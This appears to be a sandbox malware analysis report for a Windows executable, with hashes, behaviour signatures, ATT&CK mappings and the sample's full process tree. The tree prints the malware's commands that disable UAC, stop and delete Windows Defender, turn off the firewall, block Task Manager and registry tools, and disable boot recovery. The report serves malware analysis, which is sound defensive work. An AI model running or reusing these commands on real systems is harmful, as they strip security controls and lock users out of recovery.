Overview

overview

10

Static

static

10

0778d2ae60...93.exe

windows10-2004-x64

10

2005110ee8...24.exe

windows10-2004-x64

10

290072a9e1...51.exe

windows10-2004-x64

10

3998d0e987...7f.exe

windows10-2004-x64

10

435844f4e1...2b.exe

windows10-2004-x64

3

495fbfecbc...72.exe

windows10-2004-x64

1

542c157186...88.exe

windows10-2004-x64

10

561d7f0505...35.exe

windows10-2004-x64

10

617364875d...bb.exe

windows10-2004-x64

3

6312ac9176...d8.exe

windows10-2004-x64

10

63545fa195...8a.exe

windows10-2004-x64

10

6555038a04...42.exe

windows10-2004-x64

10

677393ff5e...59.exe

windows10-2004-x64

1

680caf0e30...75.exe

windows10-2004-x64

10

70192d461c...8b.exe

windows10-2004-x64

3

76199c2662...6d.exe

windows10-2004-x64

3

8727091cbb...44.exe

windows10-2004-x64

10

91450f9e8a...dc.exe

windows10-2004-x64

10

93386ea79c...b9.exe

windows10-2004-x64

6

942bc9e43e...7c.exe

windows10-2004-x64

10

ac7a29cb82...b8.exe

windows10-2004-x64

10

baa851154b...1f.exe

windows10-2004-x64

10

bb5ca9d8de...69.exe

windows10-2004-x64

10

c15e2ffa84...07.exe

windows10-2004-x64

10

c743ba0861...26.exe

windows10-2004-x64

cfda742c2d...e5.exe

windows10-2004-x64

10

d1d74ec103...34.exe

windows10-2004-x64

1

d765e722e2...b9.exe

windows10-2004-x64

10

daa41f5230...de.exe

windows10-2004-x64

9

ed12ea76d0...0a.exe

windows10-2004-x64

10

f062577b68...e0.exe

windows10-2004-x64

10

f244a04265...35.exe

windows10-2004-x64

10

Resubmissions

13/07/2024, 09:54

240713-lxcvgawdmn 10

13/07/2024, 09:52

240713-lv46yawdkj 10

13/07/2024, 09:46

240713-lrz3tayajc 10

Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/07/2024, 09:46

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe

  • Size

    3.8MB

  • MD5

    15995b0b1fc5dd82f1c3ba1b7b40c5d4

  • SHA1

    3b6a4a5b8b1107854e35b01cd28b4cce7a003413

  • SHA256

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35

  • SHA512

    4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781

  • SSDEEP

    49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Score
10/10
evasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1284
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3828
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1784

    Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Persistence

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Event Triggered Execution

          1
          T1546

          Netsh Helper DLL

          1
          T1546.007

          Privilege Escalation

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Event Triggered Execution

          1
          T1546

          Netsh Helper DLL

          1
          T1546.007

          Defense Evasion

          Abuse Elevation Control Mechanism

          1
          T1548

          Bypass User Account Control

          1
          T1548.002

          Impair Defenses

          2
          T1562

          Disable or Modify System Firewall

          1
          T1562.004

          Disable or Modify Tools

          1
          T1562.001

          Modify Registry

          1
          T1112

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Lateral Movement

          Collection

          Command and Control

          Exfiltration

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            149d8ea75129b5bac13935c6f7ee2b40

            SHA1

            ec14c55a848e3dd28e474e8a67276589022ee5fa

            SHA256

            e4a07720c6d373c2e2e13ca98e4ccc169d6bf4fa15df35fef9a4d69185e023bd

            SHA512

            fb65b85dc3f4341dbf6640355c25238f31fade0547fc6214f7c83d70f6d98f05fa43a6fe7c1ec9e9454a463d482eb77efca0dbccc157baabd15bf89c865e27bc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e5bfec1063a497048fffb231a0621403

            SHA1

            97cf6a89f237f43b9c22e3e081f7d45924d435ba

            SHA256

            325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

            SHA512

            e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            58b97594c4d764d5d99a459fbee0fd33

            SHA1

            4d1f8f4f5bbf87a6ea3ae7b7be623542377365da

            SHA256

            8001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2

            SHA512

            874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e89c193840c8fb53fc3de104b1c4b092

            SHA1

            8b41b6a392780e48cc33e673cf4412080c42981e

            SHA256

            920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

            SHA512

            865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            5caad758326454b5788ec35315c4c304

            SHA1

            3aef8dba8042662a7fcf97e51047dc636b4d4724

            SHA256

            83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

            SHA512

            4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            38f0f14cc7ca72ad51216866e66efb4e

            SHA1

            34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

            SHA256

            668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

            SHA512

            4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            ef5ef35c3059825861b16409862d0e3d

            SHA1

            cde5311765478b1bcf309219c1a86a0238612099

            SHA256

            53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

            SHA512

            3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b9c2e6782fd47c983dc61478147f7176

            SHA1

            ebaf50c810dbeca3846867c685d77ae4c871f253

            SHA256

            010430a83f5f1bbd71687b20e9055bbdf643c4c4c5d2b9a5d18098a751750a0b

            SHA512

            bbca313407db73166df19c9a6e5c0ddd520f316dd7ddc0160b2a0cb31139e45aef6f2cff667a3025df56f2bb5e36a4b25dab39a16ff9f914857588d4e3e19834

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            5ed3bd9bc72e312aadc7571ad8786379

            SHA1

            c6cc90bf1250e7ec5cd7680a9689940cec6398da

            SHA256

            8c54d4148a9e2a3b524f471f99aa3d48778239ae494908b544ef8f014d7d0eee

            SHA512

            d020f76b71142f58c990f62354c568d9cee901a2e808d11d4e6d439aa3ffc36f070d613e3bd9522aaa1d44d3288c91c89fcf911600fdad9e96d3900c12941c47

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
            Filesize

            247KB

            MD5

            5cae01aea8ed390ce9bec17b6c1237e4

            SHA1

            3a80a49efaac5d839400e4fb8f803243fb39a513

            SHA256

            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

            SHA512

            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq2vo3nv.fj1.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\prorun.bat
            Filesize

            2KB

            MD5

            0f887625226181fb0136e6145919e56a

            SHA1

            1477b214aafcf9a518f7a13832da00d639f22943

            SHA256

            8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8

            SHA512

            81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

            Download Submit

          • memory/2052-29-0x00000260F5730000-0x00000260F5752000-memory.dmp

            Filesize

            136KB

            Download

          • memory/2612-0-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2612-14-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2612-1-0x0000023B60B20000-0x0000023B60EF6000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/2612-141-0x0000023B62D30000-0x0000023B62D50000-memory.dmp

            Filesize

            128KB

            Download

          • memory/2612-142-0x0000023B7B5C0000-0x0000023B7B5CA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/2612-143-0x0000023B7B8B0000-0x0000023B7BA1A000-memory.dmp

            Filesize

            1.4MB

            Download